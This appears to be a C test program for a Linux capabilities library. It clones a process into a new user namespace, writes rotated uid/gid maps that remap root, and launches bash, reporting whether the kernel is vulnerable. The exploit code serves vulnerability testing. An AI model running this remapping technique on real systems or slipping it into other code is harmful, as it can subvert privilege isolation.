1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
|
/*
* Try unsharing where we remap the root user by rotating uids (0,1,2)
* and the corresponding gids too.
*/
#define _GNU_SOURCE
#include <errno.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/capability.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <unistd.h>
#define STACK_RESERVED 10*1024
struct my_pipe {
int to[2];
int from[2];
};
static int child(void *data) {
struct my_pipe *fdsp = data;
static const char * const args[] = {"bash", NULL};
close(fdsp->to[1]);
close(fdsp->from[0]);
if (write(fdsp->from[1], "1", 1) != 1) {
fprintf(stderr, "failed to confirm setuid(1)\n");
exit(1);
}
close(fdsp->from[1]);
char datum[1];
if (read(fdsp->to[0], datum, 1) != 1) {
fprintf(stderr, "failed to wait for parent\n");
exit(1);
}
close(fdsp->to[0]);
if (datum[0] == '!') {
/* parent failed */
exit(0);
}
setsid();
execv("/bin/bash", (const void *) args);
perror("execv failed");
exit(1);
}
int main(int argc, char **argv)
{
static const char *file_formats[] = {
"/proc/%d/uid_map",
"/proc/%d/gid_map"
};
static const char id_map[] = "0 1 1\n1 2 1\n2 0 1\n3 3 49999997\n";
cap_value_t fscap = CAP_SETFCAP;
cap_t orig = cap_get_proc();
cap_flag_value_t present;
if (cap_get_flag(orig, CAP_SYS_ADMIN, CAP_EFFECTIVE, &present) != 0) {
perror("failed to read a capability flag");
exit(1);
}
if (present != CAP_SET) {
fprintf(stderr,
"environment missing cap_sys_admin - exploit not testable\n");
exit(0);
}
/* Run with this one lowered */
cap_set_flag(orig, CAP_EFFECTIVE, 1, &fscap, CAP_CLEAR);
struct my_pipe fds;
if (pipe(&fds.from[0]) || pipe(&fds.to[0])) {
perror("no pipes");
exit(1);
}
char *stack = mmap(NULL, STACK_RESERVED, PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_STACK, -1, 0);
if (stack == MAP_FAILED) {
perror("no map for stack");
exit(1);
}
if (cap_setuid(1)) {
perror("failed to cap_setuid(1)");
exit(1);
}
if (cap_set_proc(orig)) {
perror("failed to raise caps again");
exit(1);
}
pid_t pid = clone(&child, stack+STACK_RESERVED, CLONE_NEWUSER|SIGCHLD, &fds);
if (pid == -1) {
perror("clone failed");
exit(1);
}
close(fds.from[1]);
close(fds.to[0]);
if (cap_setuid(0)) {
perror("failed to cap_setuid(0)");
exit(1);
}
if (cap_set_proc(orig)) {
perror("failed to raise caps again");
exit(1);
}
char datum[1];
if (read(fds.from[0], datum, 1) != 1 || datum[0] != '1') {
fprintf(stderr, "failed to read child status\n");
exit(1);
}
close(fds.from[0]);
int i;
for (i=0; i<2; i++) {
char *map_file;
if (asprintf(&map_file, file_formats[i], pid) < 0) {
perror("allocate string");
exit(1);
}
FILE *f = fopen(map_file, "w");
free(map_file);
if (f == NULL) {
perror("fopen failed");
exit(1);
}
int len = fwrite(id_map, 1, strlen(id_map), f);
if (len != strlen(id_map)) {
goto bailok;
}
if (fclose(f)) {
goto bailok;
}
}
if (write(fds.to[1], ".", 1) != 1) {
perror("failed to write '.'");
exit(1);
}
close(fds.to[1]);
fprintf(stderr, "user namespace launched exploit worked - upgrade kernel\n");
if (wait(NULL) == pid) {
exit(1);
}
perror("launch failed");
exit(1);
bailok:
fprintf(stderr, "exploit attempt failed\n");
if (write(fds.to[1], "!", 1) != 1) {
perror("failed to inform child [ignored]");
}
exit(0);
}
|
